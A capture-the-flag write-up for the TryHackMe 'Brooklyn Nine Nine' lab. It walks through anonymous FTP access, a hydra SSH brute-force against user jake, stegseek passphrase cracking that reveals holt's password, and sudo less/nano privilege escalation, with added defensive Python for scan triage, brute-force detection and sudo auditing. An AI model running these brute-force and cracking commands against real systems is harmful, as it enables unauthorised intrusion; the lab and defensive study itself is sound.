[THM] Brooklyn Nine Nine

Published:

Word count:
664


Port scan

nmap -sV -sC -v 10.48.179.149
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.190.111
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Three open ports were found; the focus is the FTP service on port 21 and the HTTP service on port 80.
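Before moving on to the two methods, here is an added example (not part of the original write-up) that turns the scan output above into a short list of exposures a defender would want to fix. It parses the port table and NSE script lines with hand-written regular expressions; the finding names, the regexes and the trimmed copy of the scan embedded as sample input are my own, not nmap's.

```python
"""Triage helper for nmap -sV -sC output.

Added example, not part of the original write-up: it parses the scan text
shown above and turns the NSE script output into findings a defender would
want to act on. The finding names and the regular expressions are my own
assumptions, not nmap's API.
"""
import re

# Sample input: the port/script section of the scan from the write-up.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Control connection is plain text
| Data connections will be plain text
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
"""

# "21/tcp open ftp vsftpd 3.0.3" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# An ls-style line inside ftp-anon output, e.g.
# "|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt"
ANON_FILE_RE = re.compile(
    r"^\|_?\s*[-dl][rwxsStT-]{9}\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$"
)


def parse_ports(text):
    """Group the scan into {port: {state, service, version, script: [lines]}}."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "script": [],
            }
        elif line.startswith("|") and current is not None:
            # NSE script output belongs to the most recent port line
            ports[current]["script"].append(line)
    return ports


def triage(text):
    """Return (port, finding) tuples for the FTP exposures visible in the scan."""
    findings = []
    for port, info in parse_ports(text).items():
        if info["service"] != "ftp":
            continue
        script = "\n".join(info["script"])
        if "Anonymous FTP login allowed" in script:
            findings.append((port, "anonymous FTP login enabled"))
        if "Control connection is plain text" in script:
            findings.append((port, "FTP credentials and data sent in cleartext"))
        for line in info["script"]:
            m = ANON_FILE_RE.match(line)
            if m:
                findings.append((port, f"file readable by anonymous users: {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT):
        print(f"{port}/tcp: {finding}")
```

Run against the scan above it reports the anonymous login, the cleartext control channel and the exposed note_to_jake.txt; disabling `anonymous_enable` in vsftpd.conf (or restricting the anonymous root to files meant to be public) removes the first and third.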

Method one

Probing the service on port 21

The usual thing to try against FTP is anonymous login; it turns up a file, note_to_jake.txt.

kali@kali ~/Desktop $ ftp 10.48.179.149 21
Connected to 10.48.179.149.
220 (vsFTPd 3.0.3)
Name (10.48.179.149:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||11944|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp>

Reading it shows that jake's password is weak; the note also names two other users, amy and holt.

cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

First, use hydra to brute-force jake's SSH password; it is found quickly and can be used to log in.

hydra -l jake -P /usr/share/wordlists/rockyou.txt -vV -e ns 10.48.179.149 ssh
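From the target's side, the hydra run above is a burst of failed sshd logins from one client followed by a success. The following added example (mine, not from the write-up) shows the detection logic for that pattern over sshd lines in Ubuntu's /var/log/auth.log format. The log lines, hostname, client addresses and the five-failures-per-minute threshold are constructed assumptions.

```python
"""Detect SSH password-guessing bursts in sshd auth-log lines.

Added example, not part of the original write-up. The log lines below are
constructed in the format Ubuntu's sshd writes to /var/log/auth.log; the
hostname, client IPs and the threshold/window values are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: six failures for the same client in a few seconds,
# then a successful password login from that client, then unrelated traffic.
SAMPLE_LOG = """\
May 17 10:00:01 ninenine sshd[1201]: Failed password for jake from 192.168.190.111 port 40110 ssh2
May 17 10:00:01 ninenine sshd[1203]: Failed password for jake from 192.168.190.111 port 40112 ssh2
May 17 10:00:02 ninenine sshd[1205]: Failed password for jake from 192.168.190.111 port 40114 ssh2
May 17 10:00:02 ninenine sshd[1207]: Failed password for invalid user admin from 192.168.190.111 port 40116 ssh2
May 17 10:00:03 ninenine sshd[1209]: Failed password for jake from 192.168.190.111 port 40118 ssh2
May 17 10:00:03 ninenine sshd[1211]: Failed password for jake from 192.168.190.111 port 40120 ssh2
May 17 10:00:04 ninenine sshd[1213]: Accepted password for jake from 192.168.190.111 port 40122 ssh2
May 17 10:05:00 ninenine sshd[1300]: Accepted publickey for amy from 10.0.0.5 port 51000 ssh2
May 17 10:07:30 ninenine sshd[1302]: Failed password for holt from 10.0.0.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse(text, year=2020):
    """Turn matching sshd lines into event dicts (syslog lines carry no year)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag client IPs with >= threshold failures inside `window`.

    Each alert records how many failures the client produced, which user
    names it tried, and which users it later logged in as (a success right
    after a burst is the sign that a guess worked).
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        fails = sorted((e for e in evs if e["result"] == "Failed"), key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits within `window`
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = fails[end]["ts"]
                later_success = [
                    e["user"] for e in evs
                    if e["result"] == "Accepted" and e["ts"] >= burst_end
                ]
                alerts[ip] = {
                    "failures": len(fails),
                    "users": sorted({e["user"] for e in fails}),
                    "success_after": later_success,
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse(SAMPLE_LOG)).items():
        print(ip, info)
```

On the sample it flags 192.168.190.111 with six failures against jake and admin and a subsequent successful login as jake, which is the event an incident responder would treat as a compromised account rather than just noise; the single failure from 10.0.0.7 stays below the threshold.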

Privilege escalation via sudo

Running sudo -l to check permissions shows that less can be run with sudo.

The escalation command can then be looked up on GTFOBins, and a root shell follows easily.

Method two

Probing the service on port 80

Viewing the page source reveals a hint that something is hidden in an image, so download the background image.

steghide --extract -sf brooklyn99.jpg can extract the embedded file, but a passphrase has been set on it.

stegseek is used here to crack the passphrase.

stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "admin"
[i] Original filename: "note.txt".
[i] Extracting to "brooklyn99.jpg.out".

Then run steghide again to extract note.txt from the image.

It turns out to contain the SSH password for the holt account.

cat note.txt
Holts Password:
fluffydog12@ninenine

Enjoy!!

Privilege escalation via sudo

sudo -l shows that nano can be run with sudo.

Find the command on GTFOBins and get root.
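Both methods end the same way: a sudo rule that grants an interactive program (less for jake, nano for holt) which can hand its user a root shell. As an added example covering both sudo sections (mine, not from the write-up), the audit below parses `sudo -l` output and flags such rules, which is the check an administrator would run before granting them. The set of shell-capable programs is deliberately limited to the two the write-up names and would be extended from GTFOBins in a real audit; the sample outputs, hostname and amy's rule are constructed.

```python
"""Audit `sudo -l` output for rules that effectively grant a root shell.

Added example, not part of the original write-up. SHELL_CAPABLE holds only
the two programs the write-up mentions (an assumption; extend it from
GTFOBins for real use). The sample outputs, hostname and amy's rule are
constructed.
"""
import os
import re

# Interactive pager/editor programs known to be able to spawn a shell.
SHELL_CAPABLE = {"less", "nano"}

SAMPLE_JAKE = """\
Matching Defaults entries for jake on brooklyn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jake may run the following commands on brooklyn:
    (ALL) NOPASSWD: /usr/bin/less
"""
SAMPLE_HOLT = """\
User holt may run the following commands on brooklyn:
    (root) /usr/bin/nano
"""
SAMPLE_AMY = """\
User amy may run the following commands on brooklyn:
    (root) NOPASSWD: /usr/bin/id, /usr/bin/uptime
"""

USER_RE = re.compile(r"^User (?P<user>\S+) may run")
# "(ALL) NOPASSWD: /usr/bin/less" -> runas, tag list, comma-separated commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return (user, [rule dicts]) from the text printed by `sudo -l`."""
    user, rules = None, []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m["user"]
            continue
        m = RULE_RE.match(line)
        if m and user is not None:
            tags = {t.strip(": ") for t in m["tags"].split()}
            cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
            rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in tags, "commands": cmds})
    return user, rules


def audit(text):
    """Return (user, [(severity, message)]) for rules that give away a root shell."""
    user, rules = parse_sudo_l(text)
    findings = []
    for r in rules:
        for cmd in r["commands"]:
            name = os.path.basename(cmd.split()[0])
            risky = cmd == "ALL" or name in SHELL_CAPABLE
            if cmd == "ALL":
                findings.append(("high", f"{user}: unrestricted sudo (ALL) as {r['runas']}"))
            elif name in SHELL_CAPABLE:
                findings.append(("high", f"{user}: {cmd} as {r['runas']} is an interactive "
                                         f"program that can spawn a shell"))
            if risky and r["nopasswd"]:
                findings.append(("info", f"{user}: {cmd} carries NOPASSWD, so any process "
                                         f"running as {user} reaches root without a prompt"))
    return user, findings


if __name__ == "__main__":
    for sample in (SAMPLE_JAKE, SAMPLE_HOLT, SAMPLE_AMY):
        user, findings = audit(sample)
        print(user, findings or "no findings")
```

The fix on the sudoers side is the usual one: grant a narrow wrapper or a specific non-interactive command instead of a pager or editor, and keep NOPASSWD off anything that can reach a shell.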

Summary

Information disclosure: anonymous FTP login

JPG image steganography

sudo privilege escalation